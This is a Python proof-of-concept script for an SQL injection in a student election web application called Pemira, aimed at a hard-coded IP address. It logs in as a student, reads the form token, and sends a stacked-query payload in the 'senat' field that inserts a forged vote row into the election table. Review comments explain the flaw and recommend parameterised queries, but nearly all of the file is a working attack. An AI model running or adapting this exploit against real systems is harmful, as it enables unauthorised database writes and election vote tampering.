PoC for Pemira Development Application SQLi Vulnerability

#!/usr/bin/python2
import requests
from PemiraHelper import login, PemiraParser, ID_BALMA, ID_SEMA
# Address of the deployment this proof of concept was written against.
HOST = "103.200.7.4"

# The SQL statement the PoC tries to get executed by the server. It inserts one
# row into tb_pemilu, filled with the first entry of ID_BALMA, a fixed number
# and a fixed address.
# NOTE(review): judging by the column names this is a vote record (candidate
# id, student number, client IP); confirm against the application schema.
# The row is written by the injected statement rather than by the application's
# own voting code, so server-side checks in that code would not apply to it.
PAYLOAD_SQLI = "INSERT INTO tb_pemilu(id_calon, nim_mhs, ip) VALUES('%s', %d, '%s')" % (
    ID_BALMA[0],
    180010001,
    '127.0.0.1',
)
def generate_sqli_payload():
    """Return the form value that embeds PAYLOAD_SQLI between SQL delimiters.

    The returned string has three parts:

    * a leading ``';`` that closes a quoted string and ends a statement,
    * PAYLOAD_SQLI itself as a second, stacked statement,
    * a trailing ``SELECT ... WHERE nim='`` that leaves one quote open.

    NOTE(review): this shape only makes sense if the server pastes the field
    into a single-quoted position of a SQL string and its database call accepts
    several statements at once; the server code is not part of this file.
    With bound parameters on the server the whole value would be treated as
    data, and with multi-statement execution disabled the stacked INSERT would
    not run.
    """
    template = "'; %s;/*-*/ SELECT * FROM tb_mhs WHERE nim='"
    return template % PAYLOAD_SQLI
def pemira_atk_sqli():
    """Log in, then POST the voting form with the crafted ``senat`` value.

    Sequence, all over plain HTTP to HOST:

    1. ``login`` (from PemiraHelper) is called with the session, HOST and the
       string "180010002" -- presumably the student number to log in as.
    2. The text of the page it returns is fed to ``PemiraParser``; the parser's
       ``TOKEN`` attribute is read afterwards (presumably the form token).
    3. ``validate.php`` receives that token, the output of
       ``generate_sqli_payload`` in ``senat`` and a fixed id in ``balma``.
    4. The response body is printed.

    What this shows for the defender: the request is sent from a logged-in
    session and carries the page's own token, so session and token checks do
    not stand in for input handling on the individual fields. The fix belongs
    in the server-side handler: bind ``senat`` and ``balma`` as query
    parameters and accept only ids of known candidates. Ordinary values for
    these fields are short opaque ids (see the ``balma`` value below), so a
    submitted value containing quotes, semicolons or SQL comment markers is a
    clear anomaly to reject and log.
    """
    with requests.Session() as session:
        page_parser = PemiraParser()
        landing = login(session, HOST, "180010002")
        page_parser.feed(landing.text)

        # An earlier, hard-coded variant of this request (previously kept here
        # as commented-out code) sent an ordinary id, "JLamqe5q-KTU3vVnd", in
        # ``senat``; that field now carries the crafted value instead.
        target_url = "http://%s/validate.php" % HOST
        form_fields = {
            "token_": page_parser.TOKEN,
            "senat": generate_sqli_payload(),
            "balma": "BVmJxh6E-S9af54pY",
            "formSubmit": "Submit"
        }
        response = session.post(target_url, data=form_fields)
        print(response.text)
def main():
    """Script entry point: run the single proof-of-concept request sequence."""
    pemira_atk_sqli()
# Run the request sequence only when the file is executed as a script; an
# import of this module sends nothing.
if __name__ == '__main__':
    main()